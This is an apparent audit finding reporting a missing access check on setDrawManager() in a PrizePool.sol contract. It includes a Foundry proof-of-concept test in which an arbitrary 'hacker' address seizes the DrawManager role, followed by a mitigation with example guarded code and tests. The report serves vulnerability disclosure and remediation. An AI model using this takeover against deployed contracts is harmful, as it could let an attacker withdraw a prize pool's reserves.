The setDrawManager() function in the PrizePool.sol contract lacks access control, allowing anyone to call it and become the DrawManager. This creates a critical vulnerability as the DrawManager has the authority to close the Draw and withdraw reserves from the prize pool. A malicious actor could exploit this vulnerability to gain unauthorized control over the DrawManager role, potentially leading to financial losses and a compromised prize pool.
Proof of Concept
The attacker calls the setDrawManager() function, passing their own address as the _drawManager parameter.
The function execution is successful, and the attacker becomes the DrawManager. Now, the attacker has control over the DrawManager role, enabling them to close the draw and potentially withdraw reserves from the prize pool.
Foundry POC:
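Add the test below to the existing test setup in Prizepool.t.sol and run it.
    function testSetDrawManagerAccessControl() public {
        address hacker = vm.addr(1337);
        // Deploy the pool with no draw manager configured
        params.drawManager = address(0);
        prizePool = new PrizePool(params);
        // Call the setter from an arbitrary, unprivileged address
        vm.prank(hacker);
        prizePool.setDrawManager(hacker);
        // The call succeeds and the caller now holds the DrawManager role
        assertEq(prizePool.drawManager(), hacker);
    }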
Tools Used
Foundry and Manual Analysis
Recommended Mitigation Steps
Add access control modifiers to the setDrawManager() function.
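One way the recommended access control could look, with a Foundry test that mirrors the PoC above but now expects a revert. This is an added example, not code from the PrizePool repository: GuardedPool, creator, onlyCreator and both custom errors are hypothetical names, and treating the deployer as the only authorized caller and making the setter one-time are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;
import "forge-std/Test.sol";

// Hypothetical stand-in for the pool: only the draw-manager setter is modelled.
contract GuardedPool {
    address public immutable creator; // assumption: the deployer is the trusted party
    address public drawManager;

    error NotCreator(address caller);
    error DrawManagerAlreadySet();

    constructor() { creator = msg.sender; }

    modifier onlyCreator() {
        if (msg.sender != creator) revert NotCreator(msg.sender);
        _;
    }

    // Restricted to the creator and settable once, so the role cannot be taken over later.
    function setDrawManager(address _drawManager) external onlyCreator {
        if (drawManager != address(0)) revert DrawManagerAlreadySet();
        drawManager = _drawManager;
    }
}

contract GuardedPoolTest is Test {
    GuardedPool pool;

    function setUp() public {
        pool = new GuardedPool(); // the test contract is the creator
    }

    function testStrangerCannotSetDrawManager() public {
        address hacker = vm.addr(1337);
        vm.prank(hacker);
        vm.expectRevert(abi.encodeWithSelector(GuardedPool.NotCreator.selector, hacker));
        pool.setDrawManager(hacker);
        assertEq(pool.drawManager(), address(0)); // role is still unassigned
    }

    function testCreatorSetsDrawManagerOnce() public {
        address manager = vm.addr(1);
        address other = vm.addr(2);
        pool.setDrawManager(manager);
        assertEq(pool.drawManager(), manager);
        vm.expectRevert(GuardedPool.DrawManagerAlreadySet.selector);
        pool.setDrawManager(other);
    }
}
```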
Lines of code
https://github.com/GenerationSoftware/pt-v5-prize-pool/blob/4bc8a12b857856828c018510b5500d722b79ca3a/src/PrizePool.sol#L299
Assessed type
Access Control